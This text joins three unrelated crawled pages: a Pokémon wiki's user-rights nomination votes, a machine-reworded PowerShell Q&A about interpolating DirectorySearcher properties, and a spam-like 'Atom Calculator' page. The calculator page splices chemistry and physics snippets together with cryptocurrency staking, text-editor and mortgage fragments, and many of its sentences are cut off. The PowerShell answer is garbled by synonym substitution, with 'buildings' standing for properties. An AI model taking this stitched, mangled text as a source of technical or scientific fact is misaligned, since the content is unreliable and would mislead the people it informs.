Jazzi (talk) 17:03, July 9, 2013 (UTC) This request for user rights was approved. — After some time I learned a lot from this Wiki; dealing with vandals, removing bad trivia and advising other members how they can improve their editing. If you are not familiar, since December 3, 2012, I added about 380 episode plots (first episode was this one) and added a lot of images (wish I knew exactly how many) and I still continue to do so, along with tagging unused images for deletion and making ideas to get more viewers. As I have done this, I know people trust me to do the right thing. Trust is what I have given to some of users here and now I ask for people to trust me to promote me as an admin and expand my work, along with helping our administrators what needs to be done. Neutral: Oppose: Comment: ### King Marth 64 (rollback) Edit This request for user rights was declined. — Reason below As Energy X has left the Rollback Section, and has now been added to the Admin group, I think that it is time to add another user to the RB position, right now, I see that Marth has applied for RB atleast once, and I do believe that upon getting RB, that his edits and skill in editing will increase, as well as his ability to decide what spam is. #### Support Edit Support:I support this as I nomm'ed Marth. Support:We can trust Marth with the rights and his edits as of late have been very good and productive. RainbowShifter 18:36, October 26, 2013 (UTC) Support:I agree. People like him are a welcome addition to the patroller team. 19:02, November 3, 2013 (UTC) Neutral: #### Oppose Edit Oppose: I was going to neutral, but voting neutral doesn't really provide anything. But I'm opposing because users are promoted to rollback when their knowledge of what spam is is solid. His ability should not increase, it should improve. Great user, yes. And I don't doubt his skill. I haven't been around much as of late to truly know the extent of his knowledge, but I'll be checking through his contributions. Another thing that is preventing me from supporting is the nomination statement. And what I mean by that is the part about telling what his ability of seeing spam. However, I am basing this on things from before I left, so I will be going through his contributions to see things now. ∂εsσℓαтευтσρια (тαℓк) 20:11, October 21, 2013 (UTC) Comment: Also an edit to remind people to vote because currently he has two supports due to the oppose which means he cannot be promoted. So if you feel he should be promoted speak now. ∂εsσℓαтευтσρια (тαℓк) 03:51, November 4, 2013 (UTC) This request for user rights was approved. — Hey y'all. Hope you're doing alright. I'm requesting rollback rights because I feel like I would make very good use of them and I'm eventually going to request admin rights (food for thought). I've been on this wiki for 2 years now and while I haven't been consistent in my editing, I assure you I will use my rights for good and for the better of this wiki. If you need credibility, I am an admin/bureau on three different wikis, a Wikia Star and have never abused my powers intentionally or for my own gain. You can also ask other users I have talked to on this wiki. I hope you'll consider me in the ranks! 06:08, November 25, 2013 (UTC) #### SupportEdit Support: I approve of this promotion. --OmegaRasengan (talk) 19:29, November 25, 2013 (UTC) Support: Agreed. He has shown to be reliable (and not only of his Wikia Star status). 12:13, December 10, 2013 (UTC) Support: Has helped a lot with some vandalism cases. RainbowShifter 17:09, December 7, 2013 (UTC) Support: He's pretty good handling bunch of other stuff. -- King Marth 64 (talkother wikisblogs) 17:13, December 10, 2013 (UTC) Support: Has done a huge amount of work, especially in regards to simplifying the templates and formatting on individual Pokemon pages. --Shockstorm (talk) 06:10, December 16, 2013 (UTC) #### OpposeEdit Comment:I will accept this in a few more days, see if it gets anymore input. RainbowShifter 18:09, December 14, 2013 (UTC) ### Adrián Perry GZ (user) Edit This request for user rights was declined. — I want to be a patrol for the following reasons. One, there are few admins on this Wiki, and as far as I'm concerned, only one is constantly active. Several users around the Wiki, constantly create new pages that don't have anything to do with the ones that we should have, most of them are personal opinions or fanmade histories, etc. The other part are speculations for upcoming Pokémon stuff, such as the anime. I saw when the pages like "Ash's Skiddo", "Serena's Espurr", "Serena's Pancham", "Jessie's Skrelp" or the like were out there. I kind of thought, "alright", but soon realized that that was speculation, because of upcoming episodes screenshots. The episode where "Serena was going to catch a Pancham" was aired, and then, Serena didn't catch a Pancham. Just Jessie caught a Pumpkaboo, but, was there a page for "Jessie's Pumpkaboo"? No. All those pages are deleted now, and those pages shall not exist until the episode where that happens is aired in Japan. Also, many users have upload fanmade photos and pics for anything, such as Ash and Serena love shipper, or "new Pokémon that are hidden within the videogames", etc. If that's true, we will have that until it is oficially confirmed by Game Freak. I would like to take care of all that, because a Wiki is an Internet site where we can find information about what we like, in this case, Pokémon, and the information this Wiki has is not that good in all pages, that's why another thing I will do (whether I become patrol or not) is reconstruct many pages, like the places in the Kalos region and moves, and many other things. So, that's why I would like to become a rollback. #### Support Edit Support: He gets my vote for his hard work. We could use more people like him. 23:06, January 20, 2014 (UTC) Support: Seems to be an active, friendly, and trusted user.   09:51, December 27, 2013 (UTC) Neutral: #### Oppose Edit Oppose: I am sure you are a good editor and all but all the reasons you stated above are not reasons for you to be a rollback. Also in your most recent 500 edits (which I did skim read through) you have not undone one edit which is what the rollback tool is for. I was going to put this under neutral but I can't really find any good points which match up the negatives, other than the fact you seem dedicated and a good editor which is great, but without the strong history of vandalism reverting I don't feel the rollback tool would have much use with you. RainbowShifter 23:27, December 27, 2013 (UTC) Oppose:I agree with Rainbow cause A Rollback is a user that reverts vandalism,but in that case you havent reverted edits that much.Instead you could have applied for admin after doing more edits and been more active thanks.BlazeFire. Oppose:To keep the vote from a stand still, I'm afraid that I'm going to have to say that you need to show me more effort in reverting information to its correct form. Comment: ### DragonSpore18 (ROLLBACK) Edit This request for user rights was declined. — This user has shown perseverance in sticking with the wiki, and as we need RB's I think that he/she will do a great job. Support: Neutral: #### Oppose Edit Oppose: I don't have anything against her or Kyurem147, but I do think that there are other users that can use the rollback tools more than they do. Yes, they have been very valuable (rarely missing a day or two of editing here), but they only report vandals, but do not revert the vandal edits... much. 13:56, March 1, 2014 (UTC) Oppose:Don't revert much vandalism. RainbowShifter 15:43, March 1, 2014 (UTC) Oppose:I want agree with Energy and Jade.Plasma X ~~ Talk ~~ My Contributions 13:38, March 1, 2014 (UTC) Comment: ### Kyurem147 (ROLLBACK) Edit This request for user rights was declined. — This user has shown perseverance in sticking with the wiki, and as we need RB's I think that he/she will do a great job. Support: Neutral: #### Oppose Edit Oppose: I don't have anything against her or Kyurem147, but I do think that there are other users that can use the rollback tools more than they do. Yes, they have been very valuable (rarely missing a day or two of editing here), but they only report vandals, but do not revert the vandal edits... much. 13:56, March 1, 2014 (UTC) Oppose:Don't revert much vandalism. RainbowShifter 15:43, March 1, 2014 (UTC) Oppose:I want agree with Energy and Jade.Plasma X ~~ Talk ~~ My Contributions 13:38, March 1, 2014 (UTC) Oppose: I agree and he marking the pages for Deletion that aren't vandalism, spam, unofficial, nor other bad things and he's slapping on other Pokemon anime pages that they're completely official in the past that he didn't give a clear reason about why he slapped the Deletion Template on the other non-vandal/spam pages that I don't think this is the right time he might get the rollback rights right now.-- King Marth 64 (talkother wikisblogs) 20:20, March 25, 2014 (UTC) Comment: ### King Marth 64 (rollback) Edit This request for user rights was approved. — I've seen many users on this Wiki and I can say King Marth 64 is one of the users that should be promoted to rollback. He rarely does mistakes and adds quite a lot of info. This Wiki needs more people like him to grow, so I vouch for him to be promoted to a rollback. As you know, I was trusted to be given administrator tools to be an admin, so I ask for the trust to be given to King Marth 64 to be given rollback tools. #### Support Edit Support: As the nominator. 22:48, May 19, 2014 (UTC) Support: Ellis99 20:57, May 22, 2014 (UTC) Support: HobbitsLover We're blasting off againnnn! 19:16, May 25, 2014 (UTC) Support: Well done you deserve my vote and this position.PlasmaX~~Wanna Talk?~~My Contributions 04:23, June 7, 2014 (UTC) Support: ––Slayingthehalcyon  (talk) 20:40, June 7, 2014 (UTC) Support: --Monfernape_If any problem? 12:15, June 16, 2014 (UTC) #### Neutral Edit Neutral: I can't say yes, but I can't say no, either. I think this Wiki needs more rollbacks and admins, so I would kind of support King Marth 64, I would if I have seen what he has done. I honestly haven't seen what he does in general here inside the Wiki, but if already three people voted for him, it means he is indeed good. Though there is something I was reading on his userpage, it is that he is semi active. But, again, I can't say yes or no. I just hope that if he gets the rollback tools, he uses them correctly. $Adrian$ $Perry GZ$ 04:26, May 30, 2014 (UTC) #### Oppose Edit Oppose:--Kyurem147 (talk) 16:14, June 16, 2014 (UTC) Comment: So, Kyurem, why do you think King Marth shouldn't have the rollback rights? 10:27, June 17, 2014 (UTC) ### Shockstorm (rollback) Edit This request for user rights was approved. — Shockstorm is a great user. I have seen people with quality edits, but they are not very active. Shockstorm, however, edits every day; whether fixing redirects or modifying templates and images. I haven't to see a bad edit from him, and I hope it stays that way. #### Support Edit Support: As nominator. 14:11, July 7, 2014 (UTC) Support: I admire him!--Monfernape_If any problem? 11:16, July 5, 2014 (UTC) Support: He doesn't make mistakes (unlike me). Ellis99 I'm feeling the flow! 11:26, July 5, 2014 (UTC) Support: If I remember correctly, Shockstorm is a user from before the time of the split, and I would be glad to have some of those members back. :D Neutral: Oppose:
2014-07-25 13:51:16
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 2, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.18668630719184875, "perplexity": 2358.3837337238842}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-23/segments/1405997894275.63/warc/CC-MAIN-20140722025814-00039-ip-10-33-131-23.ec2.internal.warc.gz"}
https://askdev.io/questions/108406/pricing-estimate-system-directoryservices
# pricing estimate System.DirectoryServices.ResultPropertyCollection I'm missing out on something below : $objSearcher = New-Object System.DirectoryServices.DirectorySearcher$objSearcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry $objSearcher.Filter = ("(objectclass=computer)")$computers = $objSearcher.findall() So the inquiry is why do both adhering to results vary? $computers | %{ "Server name in quotes $_.properties.name" "Server name not in quotes " +$_.properties.name } PS> $computers[0] | %{"$_.properties.name"; $_.properties.name} System.DirectoryServices.SearchResult.properties.name GORILLA 0 2019-12-02 03:04:02 Source Share Answers: 3 I think it concerns the manner in which PS inserts details in the "". Attempt this : "Server name in quotes$ ($_. buildings). name" Or you might also require another set of$ (). I'm not someplace that I can examine it at now. 0 2019-12-03 04:45:55 Source Close - - The listed below jobs appropriately, yet I would certainly be interested if any person has a much deeper description. PS C:\> $computers[0] | %{ "$_.properties.name"; "$($_.properties.name)" } System.DirectoryServices.SearchResult.properties.name GORILLA So presumably that $_. properties.name does not submission like I anticipated it to. If I'm envisioning effectively, the reality that the name building is multivalued creates it to return an array. Which (I assume) would certainly clarify why the adhering to jobs : $computers[0] | %{ $_.properties.name[0]} If "name" were a string this needs to return the first personality, yet due to the fact that it is an array it returns the first team. 0 2019-12-03 04:45:29 Source When you consisted of$_. properties.name in the string, it was returning the type name of the building. When a variable is consisted of in a string and also the string is reviewed, it calls the ToString method on that particular object referenced by the variable (not consisting of the participants defined after). In this instance, the ToString method is returning the type name . You can compel the analysis of the variable and also participants comparable to what EBGreen recommended, yet by utilizing "Server name in quotes $($_.properties.name)" In the various other circumstance PowerShell is reviewing the variable and also participants defined first and afterwards including it to the previous string. You are appropriate that you are coming back a collection of buildings. If you pipeline \$ computer system [0 ]. buildings to get - participant, you can discover the object version right from the command line. The integral part is listed below. TypeName : System.DirectoryServices.ResultPropertyCollection Name MemberType Definition Values Property System.Collections.ICollection Values get ; 0 2019-12-03 04:13:26 Source
2022-05-21 17:49:14
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2804245352745056, "perplexity": 5607.943125536327}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662540268.46/warc/CC-MAIN-20220521174536-20220521204536-00294.warc.gz"}
http://grottenduro.it/atom-calculator.html
# Atom Calculator It can also be the number of electrons in a neutral atom. Calculate the energy for the transition of an electron from the n = 2 level to the n = 5 level of a hydrogen atom. 2 mole to atom = 1. We don't have to worry about the formal charges on hydrogen. Compare live ATOM/PEN prices with over 2,500 currencies in real-time with historical charts and data pulled directly from top cryptocurrency exchanges. 63 x 10-34 Jo s). For example, an oxygen atom has 8 protons. Atom Calculator is a popup calculator for Input Item. An atom with high electronegativity. So, one atom of sodium weighs 3. 1 (b) Calculate the percentage yield of ethanol if 445 g of ethanol is produced from 1·0 kg of glucose. This will help you with the solution of a wide variety of problems. The cation, Na +, is generated by removal of an electron. Atomstalk December 26, 2020 0 Comments This definite integral calculator is a free online tool to evaluate the value of a definite integral of a function. To calculate Radius of Bohr's orbit for the Hydrogen atom, you need Quantum Number (n). (a) Calculate the fraction of atom sites that are vacant for copper (Cu) at its melting temperature of 1084°C (1357 K). The workers then stimulated the atom with a laser just enough to change its wave function; according to the new wave function of the atom, it now had a 50 percent probability of being in a "spin-up" state in its initial position and an equal probability of being in a "spin-down" state in a position as much as 80 nanometers away, a vast distance. Example 3 - Numbers of Protons in Neon: The element Neon (Symbol Ne) has the Atomic Number of 10. 1 The Atomic Models of Thomson and Rutherford Determining the structure of the atom was the next logical question to address following the discovery of the electron by J. A certain particle carries 2. This helps you measure the return on investment (ROI) of Bitcoin Atom (BCA). 21923857924346E-02 mol Percent composition (by mass): Element Count Atom Mass %(by mass). There are two major resources for commonly asked questions: The Atom Flight Manual The FAQ category for the complete list of FAQs The FAQ category is maintained by the senior members and staff of Discuss. The anion, I-, is formed by adding an electron to the neutral iodine atom: I + e-I-Isotope Conversion: Changing the number of neutrons in the nucleus of an atom. Then the bond is called as polar covalent bond. At GitHub, we're building the text editor we've always wanted: hackable to the core, but approachable on the first day without ever touching a config file. Cosmos Rewards Calculator. Assuming that the atom has a neutral charge, the atomic number can also refer to the number of electrons in the atom. Atom counter Enter your formula to check the number of atoms. Price * Interest Rate * % Period (months. The exposed area for each atom using a probe radius of 1. The work function for caesium atom is 1. This web page shows the scale of a hydrogen atom. (iii) 2 moles of carbon are burnt in 16 g of dioxygen. 0087, respectively). Looking at Ions We've talked about ions before. Remember that there is a maximum energy that each electron can have and still be part of its atom. Verify that the 3d xy orbital given in the table is a normalized eigenfunc-. That means that a hydrogen atom has a volume of about 6. We can however bypass it, if we are only interested in an estimate of the. ), a few sheets of paper, and a pencil. answered Sep 1, 2020 by AmarDeep01 (50. 1 The Atomic Models of Thomson and Rutherford Determining the structure of the atom was the next logical question to address following the discovery of the electron by J. If one of the atom is electronegative, it has more tendency to attract the electrons. Stable and Unstable Nuclei. calculate formula/molecular mass; calculate mols for a specific substance; perform (terrifying) calculations involving mass-mol-# particles for several substances; Just to be clear, I am talking about counting the number of atoms present in a chemical formula without involving your calculator. Protons at the atom's surface determine the atom's behavior. For details of calculation see Zimmerman. 6 x 10 -18 J atom -1. Example 3 - Numbers of Protons in Neon: The element Neon (Symbol Ne) has the Atomic Number of 10. If no extra keywords are listed, then the potential energy is the sum of pair, bond, angle, dihedral,improper, kspace (long-range), and fix energy. gives the exact final value of ATOM one will have after 1 year with n redemptions of rewards spaced evenly throughout the year. Our physicists’ team constantly create physics calculators, with equations and comprehensive explanations that cover topics from classical motion, thermodynamics, and electromagnetism to astrophysics and even quantum mechanics. Infrared radiation is measured in microns, and microwave radiation in cm. alkali_atom_functions. You can delegate/bond your ATOM in a single click within Ledger or many other wallets. 007276 u + 6 * 0. 99 g/mol + 35. Atomic number is very often symbolically represented as Z. This Cosmos calculator projects potential rewards from the amount of ATOM delegated via stakefish. Equipment: A computer with the internet connection, a calculator (The built-in calculator of the computer may be used. Bohr noticed, however, that the quantum constant formulated by the German physicist Max Planck has dimensions which, when combined with the mass and charge of the electron, produce a measure of length. That means an atom with a neutral charge is one where the number of electrons is equal to the. The number of neutrons in an atom can vary within small limits. A hydrogen atom is made from a single proton that's circled by a single electron. Before you begin, look through the Periodic Table of Elements and pick an atom. If the keyword wl is set to yes, then the W l values for each atom will be added to the output array, which are real numbers. (b) Calculate the energy of a single photon of yellow light with a wavelength of 582 nm. ), a few sheets of paper, and a pencil. This is of the order of magnitude of the lifetime of an excited hydrogen atom, whose ground state, however, appears to have infinite lifetime. Notice that the 1s orbital has the highest probability. Install atom-calca either in Atom's Preferences/Install Packages, or with apm on the command-line:. Within each shell of an atom there are some combinations of orbitals. Use the number of protons, neutrons, and electrons to draw a model of the atom, identify the element, and determine the mass and charge. Question 2. 44 g/mol (22. Viewed 8k times 1. If the atom economy is 100%, it means all the atoms that were involved in the process have been used during the process. (b) Repeat this calculation at room temperature (298 K). Equation makes a very simplistic assumption that when an electron is removed from an atom or ion, the atom/ion remains unchanged except for the removal of that electron. Cosmos ATOM coin can be bonded to a network validator to receive staking rewards. Calculate a weighted average of all the atoms of an element. SADIC input is a PDB file. Solving for the wavelength of this light gives a value of 486. The atomic number of an element, also called a proton number, tells you the number of protons or positive particles in an atom. 2) to calculate Rydberg’s constant, R = 1. The higher the bond order, the more stable the molecule. 9 u, and 2…. Adding or removing electrons from an atom does not change which element it is, just its net charge. Calculate the Energy! Student Worksheet Neils Bohr numbered the energy levels (n) of hydrogen, with level 1 (n=1) being the ground state, level 2 being the first excited state, and so on. We can find the number of moles of water using the equation:   Number of moles = mass. However, it's a decent approximation. Apple A6X (APL5598) vs. ICX and ATOM both offer a 10% return on your investment. So we have to calculate the formal charge on the nitrogen, carbon, nitrogen, carbon, oxygen, oxygen, oxygen. From those 2 info you are able to come across that the capability of an electron in a hydrogen atom is comparable to: -13. ||| Physicists use laser beams to create an atom trap in which atoms are confined within a spherical region of space with a diameter of about 1 mm. AWC gives the highest return of 20% ROI at the moment. The atomic mass of this carbon isotope is 14 amu. Here is how the Atomic Mass calculation can be explained with given input values -> 1. The space shuttle is taking off on Saturday the departure time is 3:00 P. Click Here. Public discussion forum for the Atom Editor. 097 X 10 7 m-1 c = speed of light, 3. It can also be the number of electrons in a neutral atom. The Mental Health Map tests for specific genetic variants that have been shown to influence behavior, mood, stress response and more across the 7 Core Genetic Mental Health Capabilities. This is the atomic weight of gold. A nuclide is a species of an atom with a specific number of protons and neutrons in the nucleus, for example carbon-13 with 6 protons and 7 neutrons. That said, to find the mass of one ATOM, we need to convert from moles to atoms as follows: 1. Or you can choose by one of the next two option-lists, which contains a series of common organic compounds (including their chemical formula) and all the elements. :18 1 u has a value of 1. omnicalculator. Calculate (a) radius of zinc atom in pm and (b) number of atoms present in a length of 1. Helium Atom A helium atom consists of a nucleus of charge surrounded by two electrons. OK let's make that model. Turn off atom manipulation Off; Hydrogen H; Lithium Li; Beryllium Be; Carbon C; Nitrogen N; Oxygen O; Fluorine F; Sodium Na; Magnesium Mg; Aluminium Al; Silicon Si; Phosphorus P; Sulfur S; Chlorine Cl; Bromine Br; Iodine I; Increase charge of selected atom +1; Decrease charge of selected atom-1; Bonds. The Free Ammonia Calculator can be used to do this. X-ray, visible,. The substance identifiers displayed in the InfoCard are the best available substance name, EC number, CAS number and/or the molecular and structural formulas. Explanation: To calculate the exact mass of the 0. The work function for caesium atom is 1. For students interested in continuing, the strength of the Axilrod-Teller (see B. The atom is the smallest particle of a chemical element that can exist. If one knows the atomic number Z of an atom and its neutron number N, then one can also calculate the atomic mass of the atom, also referred to as A. Predict how addition or subtraction of a. A hydrogen atom is made from a single proton that's circled by a single electron. Turn off atom manipulation Off; Hydrogen H; Lithium Li; Beryllium Be; Carbon C; Nitrogen N; Oxygen O; Fluorine F; Sodium Na; Magnesium Mg; Aluminium Al; Silicon Si; Phosphorus P; Sulfur S; Chlorine Cl; Bromine Br; Iodine I; Increase charge of selected atom +1; Decrease charge of selected atom-1; Bonds. For allowances (car, shift and area), please add these to basic income when keying into the affordability calculator. Volume = Mass ÷ Density. We know that mass number is the sum of protons and neutrons in the nucleus. Atomic theory stayed as a mostly philosophical subject, with not much actual scientific investigation or study, until the development of chemistry in the 1650s. Calculate the lattice constant a of f. atom: the smallest particle of an element that has all the properties of that element. Calculate the average value of kinetic energy of an electron in 3s state of hydrogen atom. Therefore, if an atom only has 6 electrons in its outer shell, it will try to gain 2 from another atom (which is what causes atoms to bond in various ways - either by. Another way to calculate atomic volume is to use the atomic or ionic radius of an atom (depending on whether or not you are dealing with an ion). 178 x 10^(-18) J = Different form of Rydberg's constant J is the unit for work Joules n = energy level of an atom. 0221415E+23 atom. 2044283E+24 atom. For neutrons of the same wavelength the scattering factor is not angle dependent due to the fact that the atomic nucleus is magnitudes smaller than the electron cloud. I am supposed to calculate the cost of a single aluminum atom using the given data from my teacher and the data which I have measured from my piece of aluminum foil. PART 2 - ATOM ECONOMY 8) Calculate the atom economy to make sodium from sodium chloride. Here is the data:. Write the formula to calculate the % atom economy. Intel Atom x5 x5-Z8500 vs Intel Atom x5 x5-Z8300. # RACE CALCULATOR PRINTER VERSION Problem 5. Isotopes (same protons, different neutrons) have all the same properties and behaviors of the atom type save one, atomic mass. Below is a diagram that shows the probability of finding an electron around the nucleus of a hydrogen atom. This is written by using little numbers with + or - after the atom's letters. These calculations take into account the current reward rate, prices, and other assumptions. 2 xx10^24)/"Avogadro's number" So the number of moles of H atom in it =(4xx5. 21923857924346E-02 mol Percent composition (by mass): Element Count Atom Mass %(by mass). alkali_atom_functions. A change in electrons can make an atom have a charge. 3pt} \ J {/eq}. Step 2: Locate the atom, molecule, or ion nearest the central metal atom. Calculate the amount of carbon dioxide that could be produced when (i) 1 mole of carbon is burnt in air. If no extra keywords are listed, then the potential energy is the sum of pair, bond, angle, dihedral,improper, kspace (long-range), and fix energy. Fe 2 O 3(s) + 3CO (g) ===> 2Fe (l) + 3CO 2(g) Using the atomic masses of Fe = 56, C = 12, O = 16, we can calculate the atom economy for extracting iron. 022×10^23 atoms/mol. How to calculate the charge of an atom using the number of protons and electrons. She gave a fantastic trick to find the formal charge on a. atom-calca package. (a) Calculate the atom economy for the production of ethanol. Diamagnetic Materials create an induced magnetic field in a direction opposite to an externally applied magnetic field and are therefore repelled by the applied magnetic field. In addition, you can define the charge of ions with known numbers of protons and electrons. 59223 amu/nucleus)(1. How big is a hydrogen atom? The radius of a hydrogen atom is known as the Bohr Radius, which is equal to. Adding a proton to an atom makes a new element, while adding a neutron makes an isotope, or heavier version, of that atom. We can however bypass it, if we are only interested in an estimate of the. That conversion is based on one atomic measurement unit of atomic mass for an atom of hydrogen. The operator of the kinetic energy in spherical coordinates for all s orbitals is: 1d2 2 d 2 dr + r d 1 dr. The numerical result is given above and agrees with Pauling and Beach to about. calculations_atom_single. The atom is the basic building block for all matter in the universe. Calculate the expectation values of r, r2 and of r¡1 in the ground state of the hydrogen atom. In this video, Suhani Ma’am is, well explained how to find a formal charge on any molecule or atom. Calculate value of an atom. Apple A7 vs Apple A8. Energy levels for the hydrogen atom can be calculated from the following equation: E = -1312. Therefore, the formula weight of NaCl is 58. The radii for each atom were based on the element type (H 1. An electron can become excited if it is given extra energy, such as if it. Formula to calculate neutrons. Links to other pages in this topic; Constituents of the Atom. Draw the Lewis diagram for the compound, including all valence electrons. To calculate atom weight by method two, we need to look at the Periodic Table of the Elements. Since 1961 the standard unit of atomic mass has been one-twelfth the mass of an atom of the isotope carbon-12. To calculate oxidation numbers of elements in the chemical compound, enter it's formula and click 'Calculate' (for example: Ca2+, HF2^-, Fe4[Fe(CN)6]3, NH4NO3, so42-, ch3cooh, cuso4*5h2o). The cross sections are taken from the report IAEA INDC(NDS)-440 and/or the former PCNuDat data base at BNL. Thus, within the Bohr atom framework, it is valid for He +, Li ++, Be 3+ etc. 022\times10^{23}$atoms, molecules, protons, etc. Therefore, if we make a proton the size of the picture above, 1000 pixels across, then the electron orbiting this proton is located 50,000,000 pixels to the right (but could be found anywhere in the sphere around the proton at that distance). Bohr, in 1913, explained the spectrum on a theoretical basis with his famous model of the hydrogen atom. An atom with high electronegativity. The element number of an element is the number of protons in the atom’s nucleus. ConvertUnits. 485 * 10^22 free electrons/ cm^3. before bond formation). The integral calculator allows you to enter your problem and complete the integration to see the result. R (6) Repeat Part() For The Foc Tetrahedral Site. E 2 = (-13. 178 x 10^(-18) J) / (n^2 - n_0^2) were [delta] is the Greek letter delta used to represent change of E = Energy -2. Ask the attached calculator to calculate the potential energy and apply constraints. This is illustrated by using the blast furnace reaction from example 14. You will have all the information which you need to produce a graph, if needed. Calculate the density of iron. 87 u), calculate Avogadro's number. 0221415E+23 atom. Grams to Moles calculator. CH 4+ 2H 2O→CO 2+ 4H 2 Formula mass: CH 4 = 16, H 2O = 18, H 2 = 2 Sum of formula mass of all reactants = 16 + 2(18) = 52 Atom economy = !(!)!" x 100 = 15. get_potential_energy (force_consistent = False, apply_constraint = True) [source] ¶ Calculate potential energy. The mass number or weight is the sum total of all of the inner nucliec particles: protons + neutrons = Mass. The number of lone pairs on nitrogen atom = (v - b - c) / 2 = (5 - 3 - 0) / 2 = 1. As stated in the problem, Qv = 0. The calculator estimates both the idle and full load power consumptions and recommends a PSU wattage rating for the selected components. Helium Atom A helium atom consists of a nucleus of charge surrounded by two electrons. Compare live ATOM/AUD prices with over 2,500 currencies in real-time with historical charts and data pulled directly from top cryptocurrency exchanges. Visible light wavelengths are usually expressed in nanometers (nm), and give photon energies that are given in electronvolts (eV) or kJ/mol. Grams to Moles calculator. Remember to use uppercase and lowercase on the name of athoms appropriately! Example: Mg {OH}2 (magnesium hydroxide) has one atom of magnesium, two atoms of oxygen and two atoms of hydrogen. Its melting point is 110 ̊C (230 ̊F), density 2. Convert this mass into energy using DE = Dmc 2, where c = 2. 19 calculators. Data should be separated in coma (,), space ( ), tab, or in separated lines. How big is the proton at the center of a hydrogen atom?. The atom is the basic building block for all matter in the universe. Interest Rate *. 178 x 10^(-18) J = Different form of Rydberg's constant J is the unit for work Joules n = energy level of an atom. It is soluble in water. 17 Telford Place, Arundel, QLD, 4214; Telephone: 1300 4EVOLT (438 658) Fax: +612 9502 1154; [email protected] Enter the total credit card and overdraft balances that will be paid off by the applicant(s) at completion. Average Atomic Mass Calculator Grams to Moles calculator. Bohr, in 1913, explained the spectrum on a theoretical basis with his famous model of the hydrogen atom. 02 x 10^23 = 3. The atomic masses of these atoms are 4. In this equation, the Energy, E, is a function of the energy level, n. To calculate bond order in chemistry, subtract the number of the electrons in the antibonding molecules from the number of electrons in the bonding molecules. 01, is the mass in grams of one mole of carbon. Calculate the shortest wavelength in the Balmer series of hydrogen atom. When two atoms bond to form a molecule, the electron(s) in the bond are not necessarily shared equally. Turn off atom manipulation Off; Hydrogen H; Lithium Li; Beryllium Be; Carbon C; Nitrogen N; Oxygen O; Fluorine F; Sodium Na; Magnesium Mg; Aluminium Al; Silicon Si; Phosphorus P; Sulfur S; Chlorine Cl; Bromine Br; Iodine I; Increase charge of selected atom +1; Decrease charge of selected atom-1; Bonds. With our tool, you need to enter the respective value for Quantum Number and hit the calculate button. Choose an atom with an atomic number of at least 11, since it has at least three energy level rings [source: Atomic Model Construction]. "Atom bank", "Atom" and "Digital Mortgages by Atom bank" are trading names of Atom bank plc, a company registered in England and Wales with company number 08632552. In this video, Suhani Ma’am is, well explained how to find a formal charge on any molecule or atom. R Click If You Would Like To Show Work For This Question Om Show Work SHOW HINT. The calculator will let you know the approximate dose based off of other users' experience with the same parameters. Solution for The diagram below depicts a lithium atom with three protons and four electrons. The effective nuclear charge on such an electron is given by the following equation: Zeff = Z − S. First, you need to download and install the app. Calculate the frequency of light emitted when an electron falls from level four to level one (principal quantum number n = 4 to n = 1) in a hydrogen atom. You can find a full list of our accepted income types on our lending criteria page. 6* (a million/n^2) eV. The theory developed should be applicable to hydrogen atoms and ions having just one electron. 7514M | Network hashrate: 203. Calculate the volume of the unit cell. Atom Calculator Best www. Here is a simple online oxidation number calculator to calculate the oxidation number of any compound or element by just clicking on the respective compound name in the given elements table with ease. 0221415 x 10 23 for Avogadro's number. (Hint: The mass of an ion is the same as that of an atom of the same element. Atom describes itself as a hackable text editor, and what it means is that it allows new and intermediate programmers the chance to create their own text editor without years of work or programming experience. 8346 x 10-28 kg/nucleus. Calculator Soup is a free online calculator. For the Hydrogen Atom, ionization from the ground state where #n_i = 1# => #DeltaE_(izn)=2. Please note where applicants hold a high level of unsecured debt, the maximum loan amount may be lower than the amount generated by this calculation, or the application subject to additional manual review or even declined at DIP. Presentation on percentage yield and atom economy calculations. Table of Contents How to calculate formal charge Examples How to calculate formal charge ot all atoms within a neutral molecule need be neutral. So, if we want, we can write: Mass Number = (Number of Protons) + (Number of Neutrons). A selection of worksheets together with answer sheets which are aimed at chemistry students for use in class. In any such two-particle atom, semi-classical (partially QM) analysis is able to find the radius and ground-state energy. This means that if we divide 23 grams by the number of atoms, we should have the weight of a single atom. So, as it is easily understandable when an atom has a high electronegativity, it will have more strength […]. All the elements are organized onto the Periodic Table of Elements. Instead of using either Hydrogen, or Oxygen as the standard, the isotope of Carbon with 6 protons and 6 neutrons in its nucleus (Carbon-12) was given a mass of exactly 12. Click here👆to get an answer to your question ️ Calculate the oxidation number of sulphur atom in Na2SO4. com tracks the staking yield, proof-of-stake metrics, blockchain data and everything useful to earn passive returns by delegating Cosmos (ATOM). Turn off atom manipulation Off; Hydrogen H; Lithium 